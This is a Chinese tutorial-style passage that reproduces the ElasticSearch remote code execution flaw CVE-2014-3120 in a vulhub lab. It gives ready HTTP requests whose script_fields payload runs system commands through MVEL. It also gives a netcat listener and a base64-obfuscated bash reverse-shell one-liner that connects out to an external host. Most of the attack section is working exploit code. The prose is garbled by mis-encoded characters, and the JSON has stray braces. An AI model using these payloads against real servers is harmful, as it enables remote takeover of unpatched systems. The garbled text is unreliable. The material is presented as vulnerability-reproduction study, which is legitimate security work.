怎么實(shí)現(xiàn)ElasticSearch 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2014-3120復(fù)現(xiàn)的分析

本篇文章給大家分享的是有關(guān)怎么實(shí)現(xiàn)ElasticSearch 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2014-3120復(fù)現(xiàn)的分析，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

Elasticsearch是一個基于Lucene的搜索服務(wù)器。它提供了一個分布式多用戶能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java語言開發(fā)的，并作為Apache許可條款下的開放源碼發(fā)布，是一種流行的企業(yè)級搜索引擎。

ElasticSearch有腳本運(yùn)行的功能，能夠非常方便地對查詢出來的數(shù)據(jù)再加工處理。  ElasticSearch用的腳本引擎是MVEL，這個引擎沒有做什么的防護(hù)，所以直接能夠運(yùn)行隨意代碼。  而在ElasticSearch里，默認(rèn)配置是打開動態(tài)腳本功能的，因此用戶能夠直接通過http請求，運(yùn)行隨意代碼。

ElasticSearch版本： v1.1.1

僅作漏洞復(fù)現(xiàn)記錄與實(shí)現(xiàn)，利用流程如下:

一、漏洞環(huán)境搭建

本文漏洞環(huán)境采用vulhub搭建，執(zhí)行以下命令開啟環(huán)境

cd /elasticsearch/CVE-2014-3120

docker-compose build

docker-compose up -d

執(zhí)行完畢后訪問9200端口，顯示如下

漏洞鏈接: http://192.168.101.152:9200/

二、漏洞利用過程

利用該漏洞首先需要ElasticSearch存在至少一條數(shù)據(jù)，發(fā)送以下數(shù)據(jù)包添加數(shù)據(jù)

POST /website/blog/  HTTP/1.1
Host: 192.168.91.130:9200
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 27

{
 "name": "colleget"
}

返回201狀態(tài)碼代表添加成功，之后發(fā)送以下數(shù)據(jù)包，執(zhí)行命令

POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Content-Type: application/x-www-form-urlencoded
Content-Length: 366

{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {
        }
      }
    }
  },
  "script_fields": {
      "command": {
          "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
      }
  }
}
  }
}

可以看到執(zhí)行結(jié)果回顯，接下來是反彈shell，為了方便寫了個腳本

先在dnslog上獲取域名，執(zhí)行命令后判斷目標(biāo)可出網(wǎng)

之后在服務(wù)器上執(zhí)行nc -lvvp 1234，監(jiān)聽端口，再執(zhí)行命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}

稍等一會兒就可以看到shell反彈到服務(wù)器上了

以上就是怎么實(shí)現(xiàn)ElasticSearch 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2014-3120復(fù)現(xiàn)的分析，小編相信有部分知識點(diǎn)可能是我們?nèi)粘９ぷ鲿姷交蛴玫降摹ＯＭ隳芡ㄟ^這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注億速云行業(yè)資訊頻道。